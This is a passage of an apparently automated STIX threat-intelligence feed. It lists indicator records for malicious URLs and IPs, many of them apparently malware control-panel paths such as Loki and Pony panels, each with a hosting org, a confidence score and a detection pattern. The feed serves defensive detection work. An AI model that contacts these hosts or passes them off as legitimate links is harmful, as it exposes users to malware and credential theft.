http://nortonlilly.info/zeya/login.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://nortonlilly.info/zeya/login.php']","type":"indicator","valid_from":"2020-02-22T02:53:34.767Z"} +{"created":"2020-02-22T02:53:36.179Z","description":"TS ID: 55335562472; iType: mal_url; State: active; Org: Alicloud-us; Source: CyberCrime","id":"indicator--42e0fb49-dd09-4979-a4d0-ff310d14acf8","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-91"],"modified":"2020-02-22T02:53:36.179Z","name":"mal_url: http://allenservice.ga/~zadmin/lmark/adaba/uMc.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://allenservice.ga/~zadmin/lmark/adaba/uMc.php']","type":"indicator","valid_from":"2020-02-22T02:53:36.179Z"} +{"created":"2020-02-22T02:53:45.219Z","description":"TS ID: 55335562429; iType: mal_url; State: active; Org: OVH SAS; Source: CyberCrime","id":"indicator--8d2d349a-763b-406b-ba8c-8ba684058028","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-73"],"modified":"2020-02-22T02:53:45.219Z","name":"mal_url: http://51.83.200.179/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://51.83.200.179/panel/admin.php']","type":"indicator","valid_from":"2020-02-22T02:53:45.219Z"} +{"created":"2020-02-22T02:53:56.922Z","description":"TS ID: 55335562488; iType: mal_url; State: active; Org: JSC Digital Network; Source: CyberCrime","id":"indicator--965a2554-cc08-488c-8d81-a29e8402eec1","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-92"],"modified":"2020-02-22T02:53:56.922Z","name":"mal_url: http://lighteniger.tech/hntspeed/mansft/paydy/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://lighteniger.tech/hntspeed/mansft/paydy/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-22T02:53:56.922Z"} +{"created":"2020-02-22T02:54:18.93Z","description":"TS ID: 55335562502; iType: mal_url; State: active; Org: Namecheap; Source: CyberCrime","id":"indicator--e75aa726-cbb0-486f-ac25-947fc76fb5de","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-94"],"modified":"2020-02-22T02:54:18.93Z","name":"mal_url: http://paperblank.best/gHL6qufBKIulnp11/login.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://paperblank.best/gHL6qufBKIulnp11/login.php']","type":"indicator","valid_from":"2020-02-22T02:54:18.93Z"} +{"created":"2020-02-22T02:54:18.975Z","description":"TS ID: 55335562470; iType: mal_ip; State: active; Org: Alibaba.com Singapore E-Commerce Private Limited; Source: CyberCrime","id":"indicator--9f6d9425-fc79-4493-8f95-81ac2a7ae188","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-56"],"modified":"2020-02-22T02:54:18.975Z","name":"mal_ip: 8.208.3.169","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '8.208.3.169']","type":"indicator","valid_from":"2020-02-22T02:54:18.975Z"} +{"created":"2020-02-22T02:54:27.432Z","description":"TS ID: 55335562494; iType: mal_url; State: active; Org: Alicloud-us; Source: CyberCrime","id":"indicator--1333f7e6-3af0-4aea-b798-a54f03d68ac5","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-91"],"modified":"2020-02-22T02:54:27.432Z","name":"mal_url: http://allenservice.ga/~zadmin/lmark/frega2/uMc.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://allenservice.ga/~zadmin/lmark/frega2/uMc.php']","type":"indicator","valid_from":"2020-02-22T02:54:27.432Z"} +{"created":"2020-02-22T02:54:27.479Z","description":"TS ID: 55335562474; iType: mal_url; State: active; Org: Alicloud-us; Source: CyberCrime","id":"indicator--f4e076ed-6393-49d5-adc2-cbe730ff48db","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-88"],"modified":"2020-02-22T02:54:27.479Z","name":"mal_url: http://castmart.ga/~zadmin/beta/herm/login.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://castmart.ga/~zadmin/beta/herm/login.php']","type":"indicator","valid_from":"2020-02-22T02:54:27.479Z"} +{"created":"2020-02-22T02:54:29.634Z","description":"TS ID: 55335562505; iType: mal_url; State: active; Org: ChunkHost; Source: CyberCrime","id":"indicator--2b38be23-b226-460e-9b17-4480e930f271","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-88"],"modified":"2020-02-22T02:54:29.634Z","name":"mal_url: http://almondmilkoils.com/E6OCF8w8IPI6vxKa/login.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://almondmilkoils.com/E6OCF8w8IPI6vxKa/login.php']","type":"indicator","valid_from":"2020-02-22T02:54:29.634Z"} +{"created":"2020-02-22T02:54:29.689Z","description":"TS ID: 55335562500; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime","id":"indicator--0bfd644c-62ef-4f03-9d1d-304673d912f1","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-86"],"modified":"2020-02-22T02:54:29.689Z","name":"mal_url: http://pay-robokassa.net/login.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://pay-robokassa.net/login.php']","type":"indicator","valid_from":"2020-02-22T02:54:29.689Z"} +{"created":"2020-02-22T02:54:47.42Z","description":"TS ID: 55335562476; iType: mal_url; State: active; Org: JSC Digital Network; Source: CyberCrime","id":"indicator--a15df968-dec6-4122-811e-1144011d0653","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-87"],"modified":"2020-02-22T02:54:47.42Z","name":"mal_url: http://nortonlilly.info/jb/login.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://nortonlilly.info/jb/login.php']","type":"indicator","valid_from":"2020-02-22T02:54:47.42Z"} +{"created":"2020-02-22T02:54:48.824Z","description":"TS ID: 55335562428; iType: mal_url; State: active; Org: Hostkey B.v.; Source: CyberCrime","id":"indicator--11fec449-039c-4d64-aefa-210e96074633","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-40"],"modified":"2020-02-22T02:54:48.824Z","name":"mal_url: http://185.70.185.34/host/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://185.70.185.34/host/admin.php']","type":"indicator","valid_from":"2020-02-22T02:54:48.824Z"} +{"created":"2020-02-22T02:54:49.84Z","description":"TS ID: 55335562466; iType: mal_url; State: active; Org: JSC Digital Network; Source: CyberCrime","id":"indicator--5d04eb73-cda3-4f22-bcaf-604660d26343","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-87"],"modified":"2020-02-22T02:54:49.84Z","name":"mal_url: http://nortonlilly.info/ace1/st/login.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://nortonlilly.info/ace1/st/login.php']","type":"indicator","valid_from":"2020-02-22T02:54:49.84Z"} +{"created":"2020-02-22T02:54:51.052Z","description":"TS ID: 55335562498; iType: mal_url; State: active; Org: Dedicated-servers; Source: CyberCrime","id":"indicator--f7bafcb3-679f-4959-8ed0-d3d8b62eceef","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-79"],"modified":"2020-02-22T02:54:51.052Z","name":"mal_url: http://94.100.18.4/primfive/logs/omc.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://94.100.18.4/primfive/logs/omc.php']","type":"indicator","valid_from":"2020-02-22T02:54:51.052Z"} +{"created":"2020-02-22T02:54:51.08Z","description":"TS ID: 55335562469; iType: mal_url; State: active; Org: Alicloud-us; Source: CyberCrime","id":"indicator--4913d346-5153-40a6-b5ab-9854e91f4ac6","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-91"],"modified":"2020-02-22T02:54:51.08Z","name":"mal_url: http://allenservice.ga/~zadmin/lmark/gold/uMc.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://allenservice.ga/~zadmin/lmark/gold/uMc.php']","type":"indicator","valid_from":"2020-02-22T02:54:51.08Z"} +{"created":"2020-02-22T02:54:57.998Z","description":"TS ID: 55335562501; iType: mal_url; State: active; Org: Avguro Technologies Ltd. Hosting service provider; Source: CyberCrime","id":"indicator--abd1ec0d-3831-4ae8-93fd-fa22ed4d20fd","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-69"],"modified":"2020-02-22T02:54:57.998Z","name":"mal_url: http://dronius267.myjino.ru/login.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://dronius267.myjino.ru/login.php']","type":"indicator","valid_from":"2020-02-22T02:54:57.998Z"} +{"created":"2020-02-22T02:54:58.082Z","description":"TS ID: 55335562493; iType: mal_url; State: active; Org: JSC Digital Network; Source: CyberCrime","id":"indicator--21a62996-f4f5-4b77-be5d-4f84a7e7d084","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-90"],"modified":"2020-02-22T02:54:58.082Z","name":"mal_url: http://aladebtrading.com/loki/Panel/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://aladebtrading.com/loki/Panel/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-22T02:54:58.082Z"} +{"created":"2020-02-22T02:54:59.268Z","description":"TS ID: 55335562496; iType: mal_url; State: active; Source: CyberCrime","id":"indicator--7f70004c-d9ab-4f22-b3d8-511682528ccc","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-75"],"modified":"2020-02-22T02:54:59.268Z","name":"mal_url: http://193.142.59.88/primsix/logs/omc.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://193.142.59.88/primsix/logs/omc.php']","type":"indicator","valid_from":"2020-02-22T02:54:59.268Z"} +{"created":"2020-02-22T02:54:59.71Z","description":"TS ID: 55335562514; iType: mal_url; State: active; Org: ServerMania; Source: CyberCrime","id":"indicator--0c36d9c7-4938-49c0-9704-38aeaee90f95","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-68"],"modified":"2020-02-22T02:54:59.71Z","name":"mal_url: http://worldatdoor.in/nato/Pony/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://worldatdoor.in/nato/Pony/panel/admin.php']","type":"indicator","valid_from":"2020-02-22T02:54:59.71Z"} +{"created":"2020-02-22T02:55:06.175Z","description":"TS ID: 55335562464; iType: mal_url; State: active; Org: JSC Digital Network; Source: CyberCrime","id":"indicator--af30a658-0eea-4daf-b26f-26f060e56bc9","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-87"],"modified":"2020-02-22T02:55:06.175Z","name":"mal_url: http://nortonlilly.info/jp/login.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://nortonlilly.info/jp/login.php']","type":"indicator","valid_from":"2020-02-22T02:55:06.175Z"} +{"created":"2020-02-22T02:55:16.703Z","description":"TS ID: 55335562478; iType: mal_url; State: active; Org: ServerMania; Source: CyberCrime","id":"indicator--6c50747b-39c8-48c7-9fdc-86427a702ce1","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-68"],"modified":"2020-02-22T02:55:16.703Z","name":"mal_url: http://worldatdoor.in/lewis1/Panel/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://worldatdoor.in/lewis1/Panel/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-22T02:55:16.703Z"} +{"created":"2020-02-22T02:55:26.13Z","description":"TS ID: 55335562507; iType: mal_url; State: active; Org: QuadraNet; Source: CyberCrime","id":"indicator--a2d5be60-5ee7-4dc6-b626-f5af241f2da0","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-45"],"modified":"2020-02-22T02:55:26.13Z","name":"mal_url: http://67.215.224.144/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://67.215.224.144/login']","type":"indicator","valid_from":"2020-02-22T02:55:26.13Z"} +{"created":"2020-02-22T02:55:32.068Z","description":"TS ID: 55335562512; iType: mal_url; State: active; Org: Host Sailor Ltd.; Source: CyberCrime","id":"indicator--d1c9a2c5-972d-4de3-97b5-c8175e4a0c4c","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-67"],"modified":"2020-02-22T02:55:32.068Z","name":"mal_url: http://abyng.com/mg/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://abyng.com/mg/panel/admin.php']","type":"indicator","valid_from":"2020-02-22T02:55:32.068Z"} +{"created":"2020-02-22T02:55:34.073Z","description":"TS ID: 55335562503; iType: mal_ip; State: active; Org: Namecheap; Source: CyberCrime","id":"indicator--bb1eb654-4bcc-4292-a65d-879efac8ff18","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-87"],"modified":"2020-02-22T02:55:34.073Z","name":"mal_ip: 192.64.118.182","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '192.64.118.182']","type":"indicator","valid_from":"2020-02-22T02:55:34.073Z"} +{"created":"2020-02-22T02:55:37.882Z","description":"TS ID: 55335562427; iType: mal_ip; State: active; Org: Host Sailor Ltd.; Source: CyberCrime","id":"indicator--fdcefce4-18b5-4a39-9b8d-a8816fe4c411","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-76"],"modified":"2020-02-22T02:55:37.882Z","name":"mal_ip: 185.141.24.100","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '185.141.24.100']","type":"indicator","valid_from":"2020-02-22T02:55:37.882Z"} +{"created":"2020-02-22T02:55:50.468Z","description":"TS ID: 55335562509; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime","id":"indicator--8358dddf-0d73-48e3-b8cd-14dc1ba01c09","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-95"],"modified":"2020-02-22T02:55:50.468Z","name":"mal_url: http://d0lphin1337.xyz/autofarm/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://d0lphin1337.xyz/autofarm/admin.php']","type":"indicator","valid_from":"2020-02-22T02:55:50.468Z"} +{"created":"2020-02-22T02:55:52.759Z","description":"TS ID: 55335562480; iType: mal_url; State: active; Org: ServerMania; Source: CyberCrime","id":"indicator--f1deba70-4cd9-42a2-877f-9036b38c72b4","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-68"],"modified":"2020-02-22T02:55:52.759Z","name":"mal_url: http://worldatdoor.in/Panel/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://worldatdoor.in/Panel/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-22T02:55:52.759Z"} +{"created":"2020-02-23T02:51:55.106Z","description":"TS ID: 55342497317; iType: mal_url; State: active; Org: Dedicated-servers; Source: CyberCrime","id":"indicator--516caba2-8889-4f32-96e6-e4874a705085","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-81"],"modified":"2020-02-23T02:51:55.106Z","name":"mal_url: http://94.100.18.11/plugman/logs/omc.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://94.100.18.11/plugman/logs/omc.php']","type":"indicator","valid_from":"2020-02-23T02:51:55.106Z"} +{"created":"2020-02-23T02:51:55.126Z","description":"TS ID: 55342497247; iType: mal_url; State: active; Org: Clax Telecom Srl; Source: CyberCrime","id":"indicator--7ad4e7c7-e202-4d04-8bae-c717d36610e2","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-100"],"modified":"2020-02-23T02:51:55.126Z","name":"mal_url: http://stampilam.ro/axe/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://stampilam.ro/axe/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-23T02:51:55.126Z"} +{"created":"2020-02-23T02:52:00.436Z","description":"TS ID: 55342497248; iType: mal_url; State: active; Org: IHNetworks, LLC; Source: CyberCrime","id":"indicator--015e9665-1524-4e79-841d-8038961e0250","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-94"],"modified":"2020-02-23T02:52:00.436Z","name":"mal_url: http://securesharing.top/Lokivo/Panel/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://securesharing.top/Lokivo/Panel/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-23T02:52:00.436Z"} +{"created":"2020-02-23T02:52:11.479Z","description":"TS ID: 55342497260; iType: mal_url; State: active; Org: Branch of BachKim Network solutions jsc; Source: CyberCrime","id":"indicator--457f24b0-3aff-4e1b-972b-80bbc70de290","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-88"],"modified":"2020-02-23T02:52:11.479Z","name":"mal_url: http://ivad.com.vn/go/playbook/onelove/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://ivad.com.vn/go/playbook/onelove/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-23T02:52:11.479Z"} +{"created":"2020-02-23T02:52:31.664Z","description":"TS ID: 55342497257; iType: mal_url; State: active; Org: Branch of BachKim Network solutions jsc; Source: CyberCrime","id":"indicator--c48537ec-9991-441c-89e6-f41295aa8b88","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-53"],"modified":"2020-02-23T02:52:31.664Z","name":"mal_url: http://mediagift.vn/.bc/playbook/onelove/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://mediagift.vn/.bc/playbook/onelove/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-23T02:52:31.664Z"} +{"created":"2020-02-23T02:52:36.705Z","description":"TS ID: 55342497265; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime","id":"indicator--c580668f-1fd0-49e7-bea8-fe3effa1854a","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-95"],"modified":"2020-02-23T02:52:36.705Z","name":"mal_url: http://fvrlink.xyz/P3/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://fvrlink.xyz/P3/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-23T02:52:36.705Z"} +{"created":"2020-02-23T02:52:38.725Z","description":"TS ID: 55342497253; iType: mal_url; State: active; Org: PT. Dhecyber Flow Indonesia; Source: CyberCrime","id":"indicator--97f5e99e-bdb3-4f2e-b9e6-b820f6c6e17c","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-61"],"modified":"2020-02-23T02:52:38.725Z","name":"mal_url: http://petroindonesia.co.id/xxx/xx/Panel/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://petroindonesia.co.id/xxx/xx/Panel/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-23T02:52:38.725Z"} +{"created":"2020-02-23T02:52:43.45Z","description":"TS ID: 55342497299; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime","id":"indicator--53d3da3c-985b-4045-bb67-cac32740c8a8","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-87"],"modified":"2020-02-23T02:52:43.45Z","name":"mal_url: http://febvnxp.xyz/P1/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://febvnxp.xyz/P1/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-23T02:52:43.45Z"} +{"created":"2020-02-23T02:52:44.281Z","description":"TS ID: 55342497255; iType: mal_url; State: active; Org: Branch of BachKim Network solutions jsc; Source: CyberCrime","id":"indicator--19faa6b5-809f-4a97-9415-10aa8711a095","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-85"],"modified":"2020-02-23T02:52:44.281Z","name":"mal_url: http://mocdong.com.vn/gx/playbook/onelove/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://mocdong.com.vn/gx/playbook/onelove/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-23T02:52:44.281Z"} +{"created":"2020-02-23T02:52:46.455Z","description":"TS ID: 55342497238; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime","id":"indicator--f023fd7f-9128-4b43-b8a4-4e18a33dbbf0","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-81"],"modified":"2020-02-23T02:52:46.455Z","name":"mal_url: http://f0405406.xsph.ru/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://f0405406.xsph.ru/login']","type":"indicator","valid_from":"2020-02-23T02:52:46.455Z"} +{"created":"2020-02-23T02:52:55.747Z","description":"TS ID: 55342497297; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime","id":"indicator--15290dad-dffe-413d-b14c-e1bcbf9c5f62","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-87"],"modified":"2020-02-23T02:52:55.747Z","name":"mal_url: http://febvnxp.xyz/P3/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://febvnxp.xyz/P3/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-23T02:52:55.747Z"} +{"created":"2020-02-23T02:53:08.502Z","description":"TS ID: 55342497311; iType: mal_url; State: active; Org: JSC Digital Network; Source: CyberCrime","id":"indicator--d04b02bf-6282-4889-95d0-bcebf5f7f3a8","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-88"],"modified":"2020-02-23T02:53:08.502Z","name":"mal_url: http://euromopy.tech/etty/black/download/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://euromopy.tech/etty/black/download/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-23T02:53:08.502Z"} +{"created":"2020-02-23T02:53:08.537Z","description":"TS ID: 55342497243; iType: mal_url; State: active; Org: LeaseWeb Netherlands B.V.; Source: CyberCrime","id":"indicator--b3da183c-cefb-4014-bc60-b838648be7b4","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-85"],"modified":"2020-02-23T02:53:08.537Z","name":"mal_url: http://mez.kl.com.ua/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://mez.kl.com.ua/panel/admin.php']","type":"indicator","valid_from":"2020-02-23T02:53:08.537Z"} +{"created":"2020-02-23T02:53:08.568Z","description":"TS ID: 55342497237; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime","id":"indicator--f18c4197-55ad-4dba-beaf-8b57fd984245","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-96"],"modified":"2020-02-23T02:53:08.568Z","name":"mal_url: http://gimhon.ml/kcyi/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://gimhon.ml/kcyi/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-23T02:53:08.568Z"} +{"created":"2020-02-23T02:53:09.543Z","description":"TS ID: 55342497304; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime","id":"indicator--a11a5e52-cd1d-4891-96a6-a9b78a260843","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-95"],"modified":"2020-02-23T02:53:09.543Z","name":"mal_url: http://febspxi.xyz/P5/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://febspxi.xyz/P5/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-23T02:53:09.543Z"} +{"created":"2020-02-23T02:53:09.578Z","description":"TS ID: 55342497256; iType: mal_url; State: active; Org: JSC Digital Network; Source: CyberCrime","id":"indicator--a5c5b970-919b-4464-b7db-694194d08632","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-94"],"modified":"2020-02-23T02:53:09.578Z","name":"mal_url: http://mirrapl.com/big/Panel/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://mirrapl.com/big/Panel/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-23T02:53:09.578Z"} +{"created":"2020-02-23T02:53:09.612Z","description":"TS ID: 55342497234; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime","id":"indicator--60a33c8d-316e-4688-b9f8-e68c82aa36b3","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-95"],"modified":"2020-02-23T02:53:09.612Z","name":"mal_url: http://terayu.tk/irkk/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://terayu.tk/irkk/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-23T02:53:09.612Z"} +{"created":"2020-02-23T02:53:12.354Z","description":"TS ID: 55342497239; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime","id":"indicator--1d8670e2-50f8-4595-bdb1-7152df77d2a7","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-81"],"modified":"2020-02-23T02:53:12.354Z","name":"mal_url: http://f0405230.xsph.ru/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://f0405230.xsph.ru/login']","type":"indicator","valid_from":"2020-02-23T02:53:12.354Z"} +{"created":"2020-02-23T02:53:17.566Z","description":"TS ID: 55342497249; iType: mal_url; State: active; Org: Media Antar Nusa PT.; Source: CyberCrime","id":"indicator--f04e05b1-5cb4-4e30-8d2e-0e1b1bae7523","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-67"],"modified":"2020-02-23T02:53:17.566Z","name":"mal_url: http://sariincofood.co.id/xx/Panel/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://sariincofood.co.id/xx/Panel/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-23T02:53:17.566Z"} +{"created":"2020-02-23T02:53:19.805Z","description":"TS ID: 55342497293; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime","id":"indicator--ebf656cd-162d-40e8-8c3a-272285600583","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-87"],"modified":"2020-02-23T02:53:19.805Z","name":"mal_url: http://febvnxp.xyz/P6/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://febvnxp.xyz/P6/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-23T02:53:19.805Z"} +{"created":"2020-02-23T02:53:27.698Z","description":"TS ID: 55342497315; iType: mal_url; State: active; Source: CyberCrime","id":"indicator--fb9e5c00-6b18-456e-9503-1a2a74d23642","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-83"],"modified":"2020-02-23T02:53:27.698Z","name":"mal_url: http://193.142.59.109/primone/logs/omc.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://193.142.59.109/primone/logs/omc.php']","type":"indicator","valid_from":"2020-02-23T02:53:27.698Z"} 